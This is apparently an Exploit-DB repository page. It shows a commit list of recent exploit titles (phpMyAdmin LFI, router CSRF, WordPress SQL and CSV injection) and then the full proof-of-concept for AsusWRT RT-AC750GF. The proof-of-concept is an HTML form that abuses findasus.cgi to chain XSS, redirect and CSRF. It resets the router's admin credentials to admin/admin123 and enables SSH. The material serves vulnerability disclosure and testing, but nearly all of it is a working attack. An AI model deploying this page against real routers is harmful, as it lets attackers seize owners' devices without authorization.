d8206fb5eb
13 changes to exploits/shellcodes KVM (Nested Virtualization) - L1 Guest Privilege Escalation DIGISOL DG-BR4000NG - Buffer Overflow (PoC) Foxit Reader 9.0.1.1049 - Remote Code Execution WordPress Plugin iThemes Security < 7.0.3 - SQL Injection phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1) phpMyAdmin 4.8.1 - Local File Inclusion phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2) WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser) Intex Router N-150 - Cross-Site Request Forgery (Add Admin) DIGISOL DG-BR4000NG - Cross-Site Scripting Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser) AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password) Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser) Intex Router N-150 - Arbitrary File Upload WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection
28 lines
No EOL
1.4 KiB
Text
28 lines
No EOL
1.4 KiB
Text
# Exploit Title: AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
|
|
# Date: 2018-06-23
|
|
# Exploit Author: Wadeek
|
|
# Vendor Homepage: https://www.asus.com/
|
|
# Firmware Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC750GF/FW_RT_AC750GF_30043806038.zip
|
|
# Firmware Version: 3.0.0.4.380.6038
|
|
# Tested on: ASUS RT-AC750GF with default firmware version 3.0.0.4.380.6038
|
|
|
|
# (Cross Site Scripting -> URL Redirecting -> Cross-Site Request Forgery {Cookie: asus_token}
|
|
# -> Change the router login password and enable SSH daemon)
|
|
|
|
<html>
|
|
<body>
|
|
<p>Proof Of Concept</p>
|
|
<!-- <form action="http://192.168.1.1/findasus.cgi" method="POST"> -->
|
|
<form action="http://router.asus.com/findasus.cgi" method="POST">
|
|
<input type="hidden" name="action_mode" value="refresh_networkmap" />
|
|
<input type="text" id="current_page" name="current_page" value="" />
|
|
<script>
|
|
// set username at admin
|
|
// set password at admin123
|
|
// enable ssh daemon
|
|
document.getElementById("current_page").value = "start_apply.htm?productid=RT-AC53¤t_page=Advanced_System_Content.asp&next_page=Advanced_System_Content.asp&modified=0&action_mode=apply&action_wait=5&action_script=restart_time%3Brestart_upnp&http_username=admin&http_passwd=admin123&http_passwd2=admin123&v_password2=admin123&sshd_enable=1&sshd_port=22&sshd_pass=1&sshd_authkeys=";
|
|
</script>
|
|
<input type="submit" value="" />
|
|
</form>
|
|
</body>
|
|
</html> |